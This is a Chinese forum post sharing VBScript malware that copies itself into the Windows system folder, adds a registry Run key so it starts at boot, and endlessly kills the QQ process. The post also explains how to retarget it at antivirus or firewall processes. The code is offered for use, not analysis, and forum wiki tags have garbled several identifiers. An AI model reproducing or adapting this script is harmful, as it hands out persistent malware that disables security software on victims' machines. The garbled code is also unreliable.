浏览主站 | 站长工具 | 新闻资讯 | 站长学院 | 站长盈利 | HTML教程 | 网址导航 | 站长周刊 | 会员投稿 | 滚动新闻 | RSS
发新话题
打印

让程序不能启动的脚本病毒

让程序不能启动的脚本病毒

[[wiki]wiki[/wiki]][/wiki]On Error Resume Next
Set fs=Create[wiki]object[/wiki]("Scripting.FileSystemObject")
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
Set r=CreateObject("Wscript.[wiki]shell[/wiki]")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\system.vbs")
r.Regwrite "HKLM\Software\Microsoft\[wiki]windows[/wiki]\CurrentVersion\Run\system","system.vbs"
do
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProce[wiki]SSL[/wiki]ist = objWMIService.ExecQ[wiki]UE[/wiki]ry _
("Select * from Win32_Process Where Name = "qq.exe"")
For Each objProcess in colProcessList
objProcess.Terminate()
Next
loop
把上面的qq.exe改成防病毒[wiki]软件[/wiki]的进程命就能变成杀[wiki]防火墙[/wiki]的病毒了

注:以上代码使用VB编译

这个脚本的原理是先杀掉QQ进程

然后在内存中一起循环运行,发现有名为qq.exe的进程便再次杀死

TOP

发新话题